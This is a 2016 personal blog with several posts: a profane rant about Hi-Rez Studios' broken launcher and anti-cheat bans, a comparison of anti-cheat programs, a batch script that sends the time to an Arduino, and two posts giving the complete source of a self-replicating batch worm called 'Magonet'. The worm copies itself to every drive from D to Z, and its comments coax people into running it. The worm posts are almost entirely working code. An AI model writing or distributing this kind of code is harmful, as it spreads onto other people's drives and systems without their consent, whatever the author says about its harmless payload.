Saturday, January 30, 2016

Follow-up: Hi-Rez Launcher broken as fuck

This goes on, and on.
Update: Finally seems that I fixed it. Setting EVERY SINGLE executable files to force run under Administrator account has somehow fixed it.

Non-Asian anti-cheat measures VS. South Korean anti-cheat measures

Anti-cheat Programs: This is non-Asian measures
Anti-cheat Programs: This is South Korean measures

1. Blizzard's Warden (1.0 / 2.0)
  • Known to scan all open windows as well as processes, plus its contents
  • Bans you permanently 
  • Once you get busted, there goes all your money
  • At least it's a part of client so it doesn't run unless you open World of Warcraft
2. Hi-Rez Studio "HiUpdateService"
  • Runs on background at startup
  • If this is not running properly, you can NEVER play any games by HRS
  • Bans you even if the game is not running
3. Steam VAC
  • Runs when you play Valve games and closes immediately when you exit
  • Runs only on select games
  • Only bans you for using cheats in online games (Not LAN games, with some exceptions)
4. Even Balance PunkBuster
  • Runs on background but only checks for things when the game is running
  • Bans you if the tool is running and/or memory addresses are altered in a way the player benefits from it
5. nProtect GameGuard
  • Ultra aggressive, if tampered while running, produces BSoD by manually initiating 0xDEADDEAD or System Protection
  • Known to cause many programs to fail
  • Hogs memory like a leaky program
  • Ultra crappy, does not protect users, only the game company (Shame on you Nexon)
6. XignCode3 and its offsprings
  • Checks for Process Managers too, and bans you if you're busted 3 times in a row
  • Was vulnerable to "Terminator" attack where user terminates XignCode3's processes while the game was running, rendering anti-cheat useless
  • Aggressive, now checks for AutoHotKey too
  • Terminates game if found "cheating", and produces garbage log that can be only read by the company who made this piece of shit
  • If something is watching service (not reading though), terminates game and gives you a yellow card
  • Bans you if you use Sandboxie to run games
7. (Not anti-cheat but well, why not) Themida
  • Glitches out very well
  • Whines to you about nonexistent "debuggers" when running Process Monitor
  • Supreme anti-tamper ability, but also makes it VERY hard to debug it
8. AhnLab HackShield
  • Piece of shit
  • Scans for rootkits and keyloggers only
  • Basically useless for real threats that might happen while running games

Hi-Rez Studios -- What in the actual fuck are you doing?

1. Your installers are broken as fuck - If I install overlapping programs (let's say I have SMITE installed and I want to play Tribes: Ascend and Paladins too), your installer messes itself up and refuses to install. Way to go, Hi-Rez!

2. InstallHirezService.exe DOES NOT EXIST when that installer messes up. So your help articles are fucking useless.

3. HiPatchService watches you like NSA and bans your account if you try to run Injector, Process Monitor, Cheat Engine or Winject. Even if you do NOT have the fucking game running.

4. Thus, when I used Cheat Engine for Borderlands 2 (SINGLE PLAYER OF COURSE.) while having SMITE installed but not running, my account just got permabanned. What the fuck?

5. Your EULA does NEVER state that you assholes would be monitoring me 24/7 to see if I have CE or WI running. You lying bastards!

6. Yes, I agree that having CE and SMITE open at the same fucking time is a sure way to get banned. But what the fuck -- just having your fucking game installed and playing something that is NOT related to your goddamn game with cheating tools is a way to get banned in the face and my testicles plus my ass? IT IS NOT, YOU FUCKING LYING ASSHOLES.

7. Oh, and when the installer messes up, Hi-Rez Authenticate service disappears from the list along with the uninstaller. And the Diagnostics tool still says that I have to uninstall it myself, while it just does not allow me to uninstall it. (The process is un-killable)

So the conclusion is:

a) They ban you in your face for just having the game installed and running the cheating tool at the same time their monitoring service is running.

b) They do not refund in-game purchases. (Not my case but people have suffered this)

c) They give you the most broken piece of shit and assumes you are satisfied with it. (At least it is free-to-pay (sic).)

I am deeply disappointed by your service, Hi-Rez Studios.
Go away, and never see me again. 
I don't want to hear your stupid excuses.

Thursday, January 21, 2016

Extremely easy Arduino Serial clock (requires Windows PC)

Since most of articles on the internet was talking about using RTC and using Serial connection to keep the time synched and none of them told me about how to actually use serial connection and send whatever I want outside of Arduino IDE automatically, here's a script that will make a decent clock that is bound to your computer.

1. Program Arduino with SerialDisplay example.
2. Wire up display.
3. Write this code, changing the "COM18" part to the port Arduino is connected to.

@echo off
set /p x="%time%" <nul >\\.\COM18
timeout /t 1 >nul
goto a

4. Save this as (whatever).cmd/bat and leave it running.
5. Voila, it's working!! Or not.

If it doesn't work:
1. Have you checked what port Arduino is connected to? You are supposed to change the "COM18" part to the port Arduino is getting signal from.
2. Are you sure your Arduino is actually connected? Try different USB ports.
3. Are you using battery power? This requires constant connection to your computer.

Note: RX LED should flash once a second.

Thursday, January 14, 2016

PoC Batch Worm update: Serious reproduction error corrected

Entire code below. Please delete old version.

@echo off
echo Magonet PoC Worm v2.0
echo (C) 2016 Mango / Thor. All rights reserved.
echo This is a Batch Proof-of-Concept worm that requires your action to spread.
echo This worm just spreads and does nothing but dropping itself to drives plugged in.
:: Proof-of-Concept Sneakernet Worm
:: Please do not modify my code.
:: 2016 Mango / Thor, all rights reserved.
:: This worm "virus" should never cause any damage to your data.
:: If it did/does, it is possible that you have gotten a variant/modified version of my PoC worm.
:: My worm just drops itself into your desktop.
:: Once you open it, it drops itself to other drives.
:: It does nothing. It just spreads.
:: Oh, and this worm is called "Magonet", like "Magnet".
copy %~0 /a C:\Magonet.cmd /y
copy C:\Magonet.cmd /a D:\ /y
copy C:\Magonet.cmd /a E:\ /y
copy C:\Magonet.cmd /a F:\ /y
copy C:\Magonet.cmd /a G:\ /y
copy C:\Magonet.cmd /a H:\ /y
copy C:\Magonet.cmd /a I:\ /y
copy C:\Magonet.cmd /a J:\ /y
copy C:\Magonet.cmd /a K:\ /y
copy C:\Magonet.cmd /a L:\ /y
copy C:\Magonet.cmd /a M:\ /y
copy C:\Magonet.cmd /a N:\ /y
copy C:\Magonet.cmd /a O:\ /y
copy C:\Magonet.cmd /a P:\ /y
copy C:\Magonet.cmd /a Q:\ /y
copy C:\Magonet.cmd /a R:\ /y
copy C:\Magonet.cmd /a S:\ /y
copy C:\Magonet.cmd /a T:\ /y
copy C:\Magonet.cmd /a U:\ /y
copy C:\Magonet.cmd /a V:\ /y
copy C:\Magonet.cmd /a W:\ /y
copy C:\Magonet.cmd /a X:\ /y
copy C:\Magonet.cmd /a Y:\ /y
copy C:\Magonet.cmd /a Z:\ /y
echo Just delete Magonet.cmd from your drives. No harm done. >%userprofile%\Desktop\Disinfection_Guide.txt

Proof-of-Concept Batch Worm: Magonet.a

Entire source code below.
Under any circumstances, DO NOT MODIFY MY CODE.

@echo off
echo Magonet Seed File
echo (C) 2016 Mango / Thor. All rights reserved.
echo This is a Batch Proof-of-Concept worm that requires your action to spread.
echo This worm just spreads and does nothing but dropping itself to drives plugged in.
:: Proof-of-Concept Sneakernet Worm
:: Please do not modify my code.
:: 2016 Mango / Thor, all rights reserved.
:: This worm "virus" should never cause any damage to your data.
:: If it did/does, it is possible that you have gotten a variant/modified version of my PoC worm.
:: My worm just drops itself into your desktop.
:: Once you open it, it drops itself to other drives.
:: It does nothing. It just spreads.
:: Oh, and this worm is called "Magonet", like "Magnet".
echo @echo off >C:\Magonet.cmd
echo :: I am a traveling worm. Drop me at the next computer. >>C:\Magonet.cmd
echo :: I am totally harmless. I do not aim to cause harm. I love you. Please just run me. >>C:\Magonet.cmd
echo :: I was created only to spread. I do not cause any damage. I can't do anything bad. >>C:\Magonet.cmd
echo :: Please just run me once. That's all I want from you. >>C:\Magonet.cmd
echo :: My name is Magonet. Copyright 2016 Mango / Thor. All rights reserved. >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a D:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a E:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a F:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a G:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a H:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a I:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a J:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a K:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a L:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a M:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a N:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a O:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a P:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a Q:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a R:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a S:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a T:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a U:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a V:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a W:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a X:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a Y:\ /y >>C:\Magonet.cmd
echo copy C:\Magonet.cmd /a Z:\ /y >>C:\Magonet.cmd
echo cls >>C:\Magonet.cmd
echo echo To disinfect: Just delete Magonet.cmd from your drives. No harm done. >>C:\Magonet.cmd
echo pause >>C:\Magonet.cmd
start C:\Magonet.cmd
echo Just delete Magonet.cmd from your drives. No harm done. >%userprofile%\Desktop\Disinfection_Guide.txt